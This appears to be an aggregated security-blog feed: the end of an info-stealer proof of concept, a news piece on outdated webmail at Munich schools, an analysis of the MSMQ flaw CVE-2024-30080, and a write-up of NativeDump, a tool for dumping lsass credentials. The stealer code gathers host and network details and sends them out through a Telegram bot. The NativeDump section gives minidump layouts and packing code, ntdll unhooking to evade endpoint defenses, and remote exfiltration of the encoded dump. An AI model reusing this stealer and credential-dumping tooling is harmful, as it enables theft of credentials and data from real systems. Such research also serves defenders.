  DWORD drives = GetLogicalDrives();

  // Get IP address
  IP_ADAPTER_INFO adapterInfo[16];  // Assuming there are no more than 16 adapters
  DWORD adapterInfoSize = sizeof(adapterInfo);
  if (GetAdaptersInfo(adapterInfo, &adapterInfoSize) != ERROR_SUCCESS) {
    printf("GetAdaptersInfo failed. error: %d has occurred.\n", GetLastError());
    return false;
  }

  snprintf(systemInfo, sizeof(systemInfo),
    "Host Name: %s\n"  // Use %s for CHAR
    "OS Version: %d.%d.%d\n"
    "Processor Architecture: %d\n"
    "Number of Processors: %d\n"
    "Logical Drives: %X\n",
    hostName,
    osVersion.dwMajorVersion, osVersion.dwMinorVersion, osVersion.dwBuildNumber,
    sysInfo.wProcessorArchitecture,
    sysInfo.dwNumberOfProcessors,
    drives);

  // Add IP address information
  for (PIP_ADAPTER_INFO adapter = adapterInfo; adapter != NULL; adapter = adapter->Next) {
    snprintf(systemInfo + strlen(systemInfo), sizeof(systemInfo) - strlen(systemInfo),
    "Adapter Name: %s\n"
    "IP Address: %s\n"
    "Subnet Mask: %s\n"
    "MAC Address: %02X-%02X-%02X-%02X-%02X-%02X\n\n",
    adapter->AdapterName,
    adapter->IpAddressList.IpAddress.String,
    adapter->IpAddressList.IpMask.String,
    adapter->Address[0], adapter->Address[1], adapter->Address[2],
    adapter->Address[3], adapter->Address[4], adapter->Address[5]);
  }
  
  char info[8196];
  snprintf(info, sizeof(info), "{\"text\":\"%s\"}", systemInfo);
  int result = sendToTgBot(info);

  if (result == 0) {
    printf("ok =^..^=\n");
  } else {
    printf("nok <3()~\n");
  }

  return 0;
}

demo

Let’s check everything in action.

Compile our “stealer” hack.c:

x86_64-w64-mingw32-g++ -O2 hack.c -o hack.exe -I/usr/share/mingw-w64/include/ -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc -fpermissive -liphlpapi -lwinhttp


And run it on my Windows 11 VM:

.\hack.exe


If we check the traffic via Wireshark, we see the IP address 149.154.167.220:

whois 149.154.167.220


As you can see, everything worked perfectly =^..^=!

Scanning via WebSec Malware Scanner:


https://websec.nl/en/scanner/result/45dfcb29-3817-4199-a6ef-da00675c6c32

Interesting result.

Of course, this is not a complex stealer; it's just a "dirty PoC", and in real attacks stealers with more sophisticated logic are used. But I think I was able to show the essence and the risks.

I hope this post with its practical example is useful for malware researchers and red teamers, and raises blue teamers' awareness of this interesting technique.

Telegram Bot API
https://github.com/python-telegram-bot/python-telegram-bot
WebSec Malware Scanner
source code in github

This is a practical case for educational purposes only.

Thanks for your time, happy hacking and good bye!
PS. All drawings and screenshots are mine

The Security of Our Children

17 June 2024 at 08:30

Why Munich's schools are becoming an attack surface for hackers

IT security at numerous primary and secondary schools in Munich is inadequate. The Bavarian teachers' association is pushing for better equipment, while the City of Munich is working on a migration.

The problem of the outdated webmail application
 
The webmail application Horde, which is used by many primary and secondary schools in Munich, has not received any updates since June 2020. According to IT security expert Florian Hansemann of HanseSecure, the fact that no updates have been applied in three and a half years poses considerable risks: "This is extremely outdated software with a very high likelihood of security vulnerabilities; hackers could have an easy time!" Hansemann further stresses that the software is no longer updated at all and has reached its so-called 'end of life'.

How might our children's data end up on the dark web?

Sensitive data of children and teenagers is processed in the email exchange between primary and secondary schools.
Florian Hansemann says: "If hackers get hold of this data, they could, for example, commit identity theft, impersonate a child, take over personal data and find out addresses, which could lead to stalking."

Such issues are of great importance. IT security experts explain that data belonging to children and teenagers regularly turns up on notorious hacker sites on the dark web.

The German Federal Office for Information Security (BSI) also warns about open vulnerabilities: "Vulnerabilities in office applications and other programs remain one of the main attack surfaces for cyberattacks."

The City of Munich, as the responsible authority, plans improvements

The City of Munich acts as the body responsible for school resources (Sachaufwandsträger), including IT security, at Bavarian schools and is planning improvements. However, the city has not given a precise timeline for completing these improvements.

Teachers as IT administrators?

Another problem is that the people responsible for IT security at schools are not always designated experts. According to the Bavarian Ministry of Education's "Recommendations for the IT equipment of schools for the years 2023 and 2024", teachers may perform technical IT administration to a limited extent. Hans Rottbauer of the teachers' association views this critically and demands that schools be adequately staffed with IT specialists.

Bavarian data protection commissioner examines the case

Munich-based lawyer Marc Maisch regards the use of the outdated webmailer as a clear violation of the General Data Protection Regulation, which requires the use of up-to-date technology. Prompted by research from BR (Bayerischer Rundfunk), Maisch has filed a complaint with the data protection commissioner, which is currently being processed.

Conclusion

Children's data must be better protected!

Gundolf Kiefer, spokesperson for the Bavarian parents' association and professor of computer engineering at the Hochschule Augsburg, criticizes the use of outdated webmailers at schools. He emphasizes the importance of data security and the special protection that the General Data Protection Regulation (GDPR) provides for the data of minors. Kiefer underlines the need to seriously consider follow-up costs and security aspects when equipping schools with IT, as well as the importance of qualified IT staff.

Image credit: https://unsplash.com/de/@profwicks

The post Die Sicherheit unserer Kinder appeared first on HanseSecure GmbH.

Simple analysis of CVE-2024-30080

17 June 2024 at 09:39

Author: k0shl of Cyber Kunlun

In the June Patch Tuesday, MSRC patched the pre-auth RCE I reported, assigned to CVE-2024-30080. This is a race condition that leads to a use-after-free remote code execution in the MSMQ HTTP component.

At POC2023 last year, Yuki Chen (@guhe120), Azure Yang (@4zure9), and I gave a presentation introducing all the MSMQ attack surfaces. After returning to work, I simply went through all of them again, and when I reviewed the MSMQ HTTP component, I found an overlooked pattern, which led to CVE-2024-30080.

The vulnerability exists in mqise.dll, in a function named RPCToServer.

CLIENT_CALL_RETURN __fastcall RPCToServer(__int64 a1, __int64 a2, __int64 a3, __int64 a4)
{
[...]
      LocalRPCConnection2QM = GetLocalRPCConnection2QM(&AddressString, v8, v9);
      if ( LocalRPCConnection2QM )
      {
        v15 = v5;
        return NdrClientCall3((MIDL_STUBLESS_PROXY_INFO *)&pProxyInfo, 0, 0i64, LocalRPCConnection2QM, a2, v15, a4);
      }
      RemoveRPCCacheEntry(&AddressString, v14);
[...]
}

At POC2023, we also introduced the MSMQ HTTP component. It receives HTTP POST data and then passes it into the RPCToServer function. The MSMQ HTTP component acts more like an RPC client; it serializes POST data as parameters of NdrClientCall3 and sends it to the MSMQ RPC server.

When I reviewed this code, I noticed these two functions: GetLocalRPCConnection2QM and RemoveRPCCacheEntry.

In the GetLocalRPCConnection2QM function, the service retrieves the RPC binding handle from a global variable. If the global variable is empty, it first binds the handle to the RPC server and then returns to the outer function.

In the RemoveRPCCacheEntry function, it removes the RPC binding handle from the global variable and then invokes RpcBindingFree to release the RPC binding handle.

The question I had when reviewing this code was: if the variable LocalRPCConnection2QM is NULL, the service invokes RemoveRPCCacheEntry instead of NdrClientCall3, but does RemoveRPCCacheEntry really do anything if the RPC binding handle is already NULL in this situation?

I quickly realized there was an overlooked pattern in this code.

Do you remember the RPC client mechanism? A typical RPC client defines an IDL file to specify the type of parameter for the RPC interface. When invoking NdrClientCall3, the parameters are marshalled according to the IDL. If the parameter is invalid, it will crash the RPC client when it is serialized in rpcrt4.dll. This is why we sometimes encounter client crashes when hunting bugs in the RPC server.

To prevent client crashes, we usually add RPC exceptions in the code as follows:

    RpcTryExcept
    {
        [...]
    }
    RpcExcept(1)
    {
        ULONG ulCode = RpcExceptionCode();
        printf("Run time reported exception 0x%lx = %ld\n",
            ulCode, ulCode);
        return false;
    }
    RpcEndExcept
        return true;

It's clear now that the overlooked pattern is that the NdrClientCall3 function is within an RPC exception block, but the IDA pseudocode doesn't show it. This means that if an unauthenticated user passes an invalid parameter into NdrClientCall3, it triggers a crash during marshalling in rpcrt4.dll, which then causes RemoveRPCCacheEntry to run and release the RPC binding handle, since it is invoked in the RpcExcept block.

There is a time window where if one thread passes an invalid parameter and then releases the RPC binding handle, while another thread retrieves the RPC binding handle from the global variable and passes it into NdrClientCall3, it will use the freed RPC handle inside rpcrt4.dll.
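A toy model of this race (Python, purely illustrative; it only mimics the shape of the bug, not the MSMQ code):

import threading, time

rpc_binding = {"handle": object()}   # stands in for the cached RPC binding handle

def invalid_request():
    # Thread A: marshalling of a bad parameter raises, and the exception
    # path (RpcExcept -> RemoveRPCCacheEntry) frees the cached handle.
    try:
        raise RuntimeError("NdrClientCall3 marshalling failure")
    except RuntimeError:
        rpc_binding["handle"] = None

def normal_request():
    # Thread B: fetches the handle (GetLocalRPCConnection2QM) before the
    # free, then uses it after the time window has elapsed.
    handle = rpc_binding["handle"]
    time.sleep(0.01)                 # the race window
    print("using freed handle!" if rpc_binding["handle"] is not handle else "ok")

b = threading.Thread(target=normal_request); b.start()
a = threading.Thread(target=invalid_request); a.start()
a.join(); b.join()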

Crash Dump:

0:021> r
rax=000001bcbf5c6df0 rbx=00000033d80fed10 rcx=0000000000000000
rdx=0000000000001e50 rsi=000001bcbaf22f10 rdi=00007ffe04f1a020
rip=00007ffe2dc0616f rsp=00000033d80fe910 rbp=00000033d80fea10
 r8=00007ffe04f1a020  r9=00000033d80fee40 r10=000001bcbf5c6df0
r11=00007ffe04f1a9bc r12=0000000000000000 r13=00000033d80feb60
r14=00000033d80ff178 r15=00007ffe04f1a2c0
iopl=0         nv up ei pl nz na po nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
RPCRT4!I_RpcNegotiateTransferSyntax+0x5f:
00007ffe`2dc0616f 817808efcdab89  cmp     dword ptr [rax+8],89ABCDEFh ds:000001bc`bf5c6df8=????????

Stack Trace:

0:021> k
 # Child-SP          RetAddr               Call Site
00 00000033`d80fe910 00007ffe`2dc9b9d3     RPCRT4!I_RpcNegotiateTransferSyntax+0x5f
01 00000033`d80fea50 00007ffe`2dc9b14d     RPCRT4!NdrpClientCall3+0x823
02 00000033`d80fedc0 00007ffe`04f141e8     RPCRT4!NdrClientCall3+0xed
03 00000033`d80ff160 00007ffe`04f13fef     MQISE!RPCToServer+0x150
04 00000033`d80ff310 00007ffe`04f138c2     MQISE!HandleEndOfRead+0xa3
05 00000033`d80ff350 00007ffe`04f53d40     MQISE!GetHttpBody+0x112

NativeDump - Dump Lsass Using Only Native APIs By Hand-Crafting Minidump Files (Without MinidumpWriteDump!)

By: Zion3R
16 June 2024 at 17:16


NativeDump allows you to dump the lsass process using only NTAPIs, generating a Minidump file with only the streams needed to be parsed by tools like Mimikatz or Pypykatz (SystemInfo, ModuleList and Memory64List streams). It relies on the following native API calls:


  • NtOpenProcessToken and NtAdjustPrivilegesToken to get the "SeDebugPrivilege" privilege
  • RtlGetVersion to get the Operating System version details (Major version, minor version and build number). This is necessary for the SystemInfo Stream
  • NtQueryInformationProcess and NtReadVirtualMemory to get the lsasrv.dll address. This is the only module necessary for the ModuleList Stream
  • NtOpenProcess to get a handle for the lsass process
  • NtQueryVirtualMemory and NtReadVirtualMemory to loop through the memory regions and dump all possible ones. At the same time it populates the Memory64List Stream

Usage:

NativeDump.exe [DUMP_FILE]

The default file name is "proc_.dmp":

The tool has been tested against Windows 10 and 11 devices with the most common security solutions (Microsoft Defender for Endpoints, Crowdstrike...) and is for now undetected. However, it does not work if PPL is enabled in the system.

Some benefits of this technique are:

  • It does not use the well-known dbghelp!MinidumpWriteDump function
  • It only uses functions from Ntdll.dll, so it is possible to bypass API hooking by remapping the library
  • The Minidump file does not have to be written to disk; you can transfer its bytes (encoded or encrypted) to a remote machine

The project has three branches at the moment (apart from the main branch with the basic technique):

  • ntdlloverwrite - Overwrite ntdll.dll's ".text" section using a clean version from the DLL file already on disk

  • delegates - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + XOR-encoding

  • remote - Overwrite ntdll.dll + Dynamic function resolution + String encryption with AES + Send file to remote machine + XOR-encoding


Technique in detail: Creating a minimal Minidump file

After reading up on the Minidump format's undocumented structures, the file layout can be summed up as:

  • Header: Information like the Signature ("MDMP"), the location of the Stream Directory and the number of streams
  • Stream Directory: One entry for each stream, containing the type, total size and location in the file of each one
  • Streams: Every stream contains different information related to the process and has its own format
  • Regions: The actual bytes from the process from each memory region which can be read

I created a parsing tool which can be helpful: MinidumpParser.

We will focus on creating a valid file with only the necessary values for the header, stream directory and the only 3 streams needed for a Minidump file to be parsed by Mimikatz/Pypykatz: SystemInfo, ModuleList and Memory64List Streams.


A. Header

The header is a 32-byte structure which can be defined in C# as:

public struct MinidumpHeader
{
    public uint Signature;
    public ushort Version;
    public ushort ImplementationVersion;
    public ushort NumberOfStreams;
    public uint StreamDirectoryRva;
    public uint CheckSum;
    public IntPtr TimeDateStamp;
}

The required values are:

  • Signature: Fixed value 0x504D444D (the "MDMP" string)
  • Version: Fixed value 0xA793 (Microsoft constant MINIDUMP_VERSION)
  • NumberOfStreams: Fixed value 3, the three streams required for the file
  • StreamDirectoryRva: Fixed value 0x20 or 32 bytes, the size of the header


B. Stream Directory

Each entry in the Stream Directory is a 12-byte structure, so with 3 entries the total size is 36 bytes. The C# struct definition for an entry is:

public struct MinidumpStreamDirectoryEntry
{
    public uint StreamType;
    public uint Size;
    public uint Location;
}

The field "StreamType" represents the type of stream as an integer or ID; some of the most relevant are:

ID Stream Type
0x00 UnusedStream
0x01 ReservedStream0
0x02 ReservedStream1
0x03 ThreadListStream
0x04 ModuleListStream
0x05 MemoryListStream
0x06 ExceptionStream
0x07 SystemInfoStream
0x08 ThreadExListStream
0x09 Memory64ListStream
0x0A CommentStreamA
0x0B CommentStreamW
0x0C HandleDataStream
0x0D FunctionTableStream
0x0E UnloadedModuleListStream
0x0F MiscInfoStream
0x10 MemoryInfoListStream
0x11 ThreadInfoListStream
0x12 HandleOperationListStream
0x13 TokenStream
0x16 ProcessVmCountersStream
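
As a sketch, the header and the three directory entries can be serialized like this (Python here purely to illustrate the byte layout; the offsets and sizes follow from the sections below):

import struct

# Pack the 32-byte header (values from section A) followed by the three
# 12-byte directory entries. Offsets 0x44, 0x7C and 0x12A are derived in
# sections C, D and E; mem64_size depends on the number of memory regions.
header = struct.pack(
    "<IIIIIIQ",
    0x504D444D,  # Signature: "MDMP"
    0xA793,      # Version (low word = MINIDUMP_VERSION)
    3,           # NumberOfStreams
    0x20,        # StreamDirectoryRva: directory starts right after the header
    0, 0, 0,     # CheckSum, TimeDateStamp, Flags
)
mem64_size = 16 + 16 * 1             # example: stream header + one region entry
directory = b"".join(struct.pack("<III", stream_type, size, rva) for stream_type, size, rva in [
    (0x07, 56, 0x44),                # SystemInfoStream
    (0x04, 112, 0x7C),               # ModuleListStream
    (0x09, mem64_size, 0x12A),       # Memory64ListStream
])
assert len(header) == 32 and len(directory) == 36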

C. SystemInformation Stream

First stream is a SystemInformation Stream, with ID 7. The size is 56 bytes and will be located at offset 68 (0x44), after the Stream Directory. Its C# definition is:

public struct SystemInformationStream
{
    public ushort ProcessorArchitecture;
    public ushort ProcessorLevel;
    public ushort ProcessorRevision;
    public byte NumberOfProcessors;
    public byte ProductType;
    public uint MajorVersion;
    public uint MinorVersion;
    public uint BuildNumber;
    public uint PlatformId;
    public uint UnknownField1;
    public uint UnknownField2;
    public IntPtr ProcessorFeatures;
    public IntPtr ProcessorFeatures2;
    public uint UnknownField3;
    public ushort UnknownField14;
    public byte UnknownField15;
}

The required values are:

  • ProcessorArchitecture: 9 for 64-bit and 0 for 32-bit Windows systems
  • MajorVersion, MinorVersion and BuildNumber: Hardcoded or obtained through kernel32!GetVersionEx or ntdll!RtlGetVersion (we will use the latter)
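
A quick sketch of that ntdll!RtlGetVersion call from Python with ctypes (illustrative only; not the tool's C# code):

import ctypes
from ctypes import wintypes

class OSVERSIONINFOW(ctypes.Structure):
    _fields_ = [("dwOSVersionInfoSize", wintypes.DWORD),
                ("dwMajorVersion", wintypes.DWORD),
                ("dwMinorVersion", wintypes.DWORD),
                ("dwBuildNumber", wintypes.DWORD),
                ("dwPlatformId", wintypes.DWORD),
                ("szCSDVersion", wintypes.WCHAR * 128)]

osvi = OSVERSIONINFOW()
osvi.dwOSVersionInfoSize = ctypes.sizeof(osvi)
ctypes.windll.ntdll.RtlGetVersion(ctypes.byref(osvi))  # returns NTSTATUS 0 on success
print(osvi.dwMajorVersion, osvi.dwMinorVersion, osvi.dwBuildNumber)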


D. ModuleList Stream

Second stream is a ModuleList stream, with ID 4. It is located at offset 124 (0x7C), after the SystemInformation stream, and it also has a fixed size of 112 bytes, since it contains the entry of a single module, the only one needed for the parsing to be correct: "lsasrv.dll".

The typical structure for this stream is a 4-byte value containing the number of entries followed by 108-byte entries for each module:

public struct ModuleListStream
{
    public uint NumberOfModules;
    public ModuleInfo[] Modules;
}

As there is only one, it gets simplified to:

public struct ModuleListStream
{
    public uint NumberOfModules;
    public IntPtr BaseAddress;
    public uint Size;
    public uint UnknownField1;
    public uint Timestamp;
    public uint PointerName;
    public IntPtr UnknownField2;
    public IntPtr UnknownField3;
    public IntPtr UnknownField4;
    public IntPtr UnknownField5;
    public IntPtr UnknownField6;
    public IntPtr UnknownField7;
    public IntPtr UnknownField8;
    public IntPtr UnknownField9;
    public IntPtr UnknownField10;
    public IntPtr UnknownField11;
}

The required values are:

  • NumberOfModules: Fixed value 1
  • BaseAddress: Using psapi!GetModuleBaseName or a combination of ntdll!NtQueryInformationProcess and ntdll!NtReadVirtualMemory (we will use the latter)
  • Size: Obtained by adding all memory region sizes from BaseAddress until one with a size of 4096 bytes (0x1000), the .text section of another library
  • PointerToName: Unicode string structure for the "C:\Windows\System32\lsasrv.dll" string, located after the stream itself at offset 236 (0xEC)


E. Memory64List Stream

Third stream is a Memory64List stream, with ID 9. It is located at offset 298 (0x12A), after the ModuleList stream and the Unicode string, and its size depends on the number of memory regions.

public struct Memory64ListStream
{
    public ulong NumberOfEntries;
    public uint MemoryRegionsBaseAddress;
    public Memory64Info[] MemoryInfoEntries;
}

Each memory region entry is a 16-byte structure:

public struct Memory64Info
{
    public IntPtr Address;
    public IntPtr Size;
}

The required values are:

  • NumberOfEntries: Number of memory regions, obtained after looping through them
  • MemoryRegionsBaseAddress: Location of the start of the memory region bytes, calculated by adding up the sizes of all 16-byte memory entries
  • Address and Size: Obtained for each valid region while looping them
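
A sketch of serializing this stream from a list of (address, size) pairs (Python for illustration; note that BaseRva is packed as a 64-bit value here, per the on-disk Minidump format, where the C# struct above simplifies it to a uint):

import struct

# Illustrative packing of the Memory64List stream at offset 0x12A.
regions = [(0x7FF600000000, 0x1000), (0x7FF600001000, 0x2000)]  # example data
stream_rva = 0x12A
base_rva = stream_rva + 16 + 16 * len(regions)   # first byte after the entries
stream = struct.pack("<QQ", len(regions), base_rva)
stream += b"".join(struct.pack("<QQ", addr, size) for addr, size in regions)
# The raw bytes read with NtReadVirtualMemory are then appended at base_rva.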


F. Looping memory regions

There are prerequisites to looping the memory regions of the lsass.exe process, which can be solved using only NTAPIs:

  1. Obtain the "SeDebugPrivilege" permission. Instead of the typical Advapi!OpenProcessToken, Advapi!LookupPrivilegeValue and Advapi!AdjustTokenPrivileges, we will use ntdll!NtOpenProcessToken, ntdll!NtAdjustPrivilegesToken and the hardcoded value of 20 for the Luid (which is constant in all latest Windows versions)
  2. Obtain the process ID. For example, loop all processes using ntdll!NtGetNextProcess, obtain the PEB address with ntdll!NtQueryInformationProcess and use ntdll!NtReadVirtualMemory to read the ImagePathName field inside ProcessParameters. To avoid overcomplicating the PoC, we will use .NET's Process.GetProcessesByName()
  3. Open a process handle. Use ntdll!NtOpenProcess with permissions PROCESS_QUERY_INFORMATION (0x0400) to retrieve process information and PROCESS_VM_READ (0x0010) to read the memory bytes

With this it is possible to traverse process memory by calling:

  • ntdll!NtQueryVirtualMemory: Returns a MEMORY_BASIC_INFORMATION structure with the protection type, state, base address and size of each memory region
    • If the memory protection is not PAGE_NOACCESS (0x01) and the memory state is MEM_COMMIT (0x1000), meaning it is accessible and committed, the base address and size populate one entry of the Memory64List stream and the bytes can be added to the file
    • If the base address equals the lsasrv.dll base address, it is used to calculate the size of lsasrv.dll in memory
  • ntdll!NtReadVirtualMemory: Adds the bytes of that region to the Minidump file after the Memory64List stream


G. Creating Minidump file

After previous steps we have all that is necessary to create the Minidump file. We can create a file locally or send the bytes to a remote machine, with the possibility of encoding or encrypting the bytes before. Some of these possibilities are coded in the delegates branch, where the file created locally can be encoded with XOR, and in the remote branch, where the file can be encoded with XOR before being sent to a remote machine.



